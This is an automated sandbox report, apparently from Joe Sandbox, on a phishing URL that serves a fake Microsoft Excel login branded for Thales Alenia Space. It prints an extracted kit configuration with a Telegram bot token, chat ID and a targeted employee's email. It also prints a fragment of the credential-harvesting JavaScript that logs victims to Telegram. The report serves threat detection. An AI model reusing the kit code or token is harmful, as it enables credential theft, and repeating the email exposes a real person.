Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=

Overview

General Information

Sample URL:https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=
Analysis ID:1470662
Infos:

Detection

Greatness Phishing Kit, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Phishing site detected (based on favicon image match)
Yara detected Greatness Phishing Kit
Yara detected HtmlPhish10
C2 URLs / IPs found in malware configuration
Javascript checks online IP of machine
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
HTTP GET or POST without a user agent

Classification

  • System is w10x64
  • chrome.exe (PID: 772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1992,i,14675786533658203022,17840661765423263018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"Bot Token": "7348030614:AAF8hBXsqFAmOXUx-cltQvFLxvEYvVvrA9g", "Chat id": "6226276777", "Email": "alberto.dosio@thalesaleniaspace.com", "Logger Token": "", "Logger Id": ""}
SourceRuleDescriptionAuthorStrings
dropped/chromecache_55JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    dropped/chromecache_55JoeSecurity_GreatnessPhishingKitYara detected Greatness Phishing KitJoe Security
      SourceRuleDescriptionAuthorStrings
      1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.1.pages.csvJoeSecurity_GreatnessPhishingKitYara detected Greatness Phishing KitJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 1.1.pages.csvMalware Configuration Extractor: Greatness Phishing Kit {"Bot Token": "7348030614:AAF8hBXsqFAmOXUx-cltQvFLxvEYvVvrA9g", "Chat id": "6226276777", "Email": "alberto.dosio@thalesaleniaspace.com", "Logger Token": "", "Logger Id": ""}
          Source: materialesvite.com.mxVirustotal: Detection: 10%Perma Link
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.htmlVirustotal: Detection: 9%Perma Link
          Source: https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=Virustotal: Detection: 9%Perma Link

          Phishing

          barindex
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.devLLM: Score: 9 brands: Thales Alenia Space Reasons: The URL 'https://pub-b350757995f541e99a5129089ef9ada7.r2.dev' does not match the legitimate domain 'thalesaleniaspace.com' associated with Thales Alenia Space. The domain 'r2.dev' is suspicious and not related to the legitimate brand. The page prominently displays a login form requesting email and password, which is a common phishing technique. There is no CAPTCHA present, which is often used to prevent automated attacks. The use of a subdomain and the mismatch between the URL and the legitimate domain are strong indicators of phishing. The overall setup and presentation of the login form are designed to mislead users into providing their credentials. DOM: 1.1.pages.csv
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comMatcher: Template: excel matched with high similarity
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_55, type: DROPPED
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_55, type: DROPPED
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: const bot_token = "7348030614:aaf8hbxsqfamoxux-cltqvflxveyvvvra9g"; const chat_id = "6226276777"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: const bot_token = "7348030614:aaf8hbxsqfamoxux-cltqvflxveyvvvra9g"; const chat_id = "6226276777"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: const bot_token = "7348030614:aaf8hbxsqfamoxux-cltqvflxveyvvvra9g"; const chat_id = "6226276777"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: Number of links: 0
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: Title: Log in | Microsoft Excel - Work together on Excel spreadsheets does not match URL
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: <input type="password" .../> found
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: No <meta name="author".. found
          Source: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html#alberto.dosio@thalesaleniaspace.comHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2

          Networking

          barindex
          Source: Malware configuration extractorIPs: 7348030614:AAF8hBXsqFAmOXUx-cltQvFLxvEYvVvrA9g
          Source: global trafficTCP traffic: 192.168.2.4:50457 -> 162.159.36.2:53
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20= HTTP/1.1Host: materialesvite.com.mxConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: materialesvite.com.mxConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /idktUJO0z7gfS5SPPyRtRndURd8dpvZzgwafI0lyy60gwzdIfN6jHaYH080v.html HTTP/1.1Host: pub-b350757995f541e99a5129089ef9ada7.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://materialesvite.com.mx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-b350757995f541e99a5129089ef9ada7.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cKV4FIx.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fktvunG.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /thalesaleniaspace.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://pub-b350757995f541e99a5129089ef9ada7.r2.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pub-b350757995f541e99a5129089ef9ada7.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /cKV4FIx.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fktvunG.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /thalesaleniaspace.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: materialesvite.com.mx
          Source: global trafficDNS traffic detected: DNS query: pub-b350757995f541e99a5129089ef9ada7.r2.dev
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
          Source: global trafficDNS traffic detected: DNS query: i.imgur.com
          Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
          Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Jul 2024 08:09:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: chromecache_55.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
          Source: chromecache_55.2.drString found in binary or memory: https://api.telegram.org/bot$
          Source: chromecache_55.2.drString found in binary or memory: https://dns.google/resolve?name=$
          Source: chromecache_58.2.dr, chromecache_62.2.dr, chromecache_57.2.dr, chromecache_68.2.drString found in binary or memory: https://fontawesome.com
          Source: chromecache_58.2.dr, chromecache_62.2.dr, chromecache_57.2.dr, chromecache_68.2.drString found in binary or memory: https://fontawesome.com/license/free
          Source: chromecache_55.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: chromecache_63.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6o3ms.woff2
          Source: chromecache_63.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.wo
          Source: chromecache_63.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.wo
          Source: chromecache_66.2.drString found in binary or memory: https://getbootstrap.com)
          Source: chromecache_66.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
          Source: chromecache_55.2.drString found in binary or memory: https://i.imgur.com/cKV4FIx.png
          Source: chromecache_55.2.drString found in binary or memory: https://i.imgur.com/fktvunG.png
          Source: chromecache_55.2.drString found in binary or memory: https://ipinfo.io/json
          Source: chromecache_67.2.drString found in binary or memory: https://ka-f.fontawesome.com
          Source: chromecache_67.2.drString found in binary or memory: https://kit.fontawesome.com
          Source: chromecache_55.2.drString found in binary or memory: https://kit.fontawesome.com/585b051251.js
          Source: chromecache_55.2.drString found in binary or memory: https://logo.clearbit.com/
          Source: chromecache_55.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
          Source: chromecache_55.2.drString found in binary or memory: https://www.docspro.nl/wp-content/uploads/2021/12/Docspro-License-Agreement.pdf
          Source: chromecache_55.2.drString found in binary or memory: https://www.google.com/s2/favicons?domain=
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50461
          Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: classification engineClassification label: mal100.phis.troj.win@17/29@22/10
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1992,i,14675786533658203022,17840661765423263018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20="
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1992,i,14675786533658203022,17840661765423263018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow d